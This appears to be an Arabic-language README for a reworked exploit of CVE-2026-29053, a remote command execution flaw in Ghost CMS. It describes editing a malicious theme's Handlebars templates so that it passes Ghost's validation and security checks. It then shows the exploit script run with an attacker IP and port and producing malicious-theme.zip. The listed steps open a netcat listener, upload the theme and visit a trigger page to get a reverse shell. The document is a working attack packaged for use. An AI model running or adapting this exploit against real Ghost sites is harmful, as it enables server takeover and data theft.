
ثغرة تنفيذ الأوامر عن بُعد (RCE) تم اكتشافها في نظام إدارة المحتوى Ghost (تؤثر تحديدًا على الإصدارات من 0.7.2 حتى 6.19.0)
هذا إعادة صياغة للمستودع الذي أنشأه rootxran لنفس ثغرة CVE - https://github.com/rootxran/CVE-2026-29053
أثناء الاختبار ضد بيئات Ghost CMS محددة، تسبب قالب الثيم الأصلي في خطأ Handlebars قاتل. فشل نظام إدارة المحتوى في تفعيل الثيم الخبيث لأنه كان يشير إلى مساعد (helper) مهمل أو مفقود (social_url) داخل ملف author.hbs.
لقد قمت بتحديث قوالب Handlebars لاستخدام مساعدات أصلية ومتوافقة. هذا يضمن اجتياز الثيم لفحوصات التحقق الداخلية في Ghost، مما يسمح للاستغلال بالتفعيل بنجاح دون أن يتم حظره بواسطة محلل الأمان الخاص بمحرك الثيمات.
الاستخدام: (راجع الاستغلال الأصلي للحصول على إرشادات الفيديو).
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip
1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/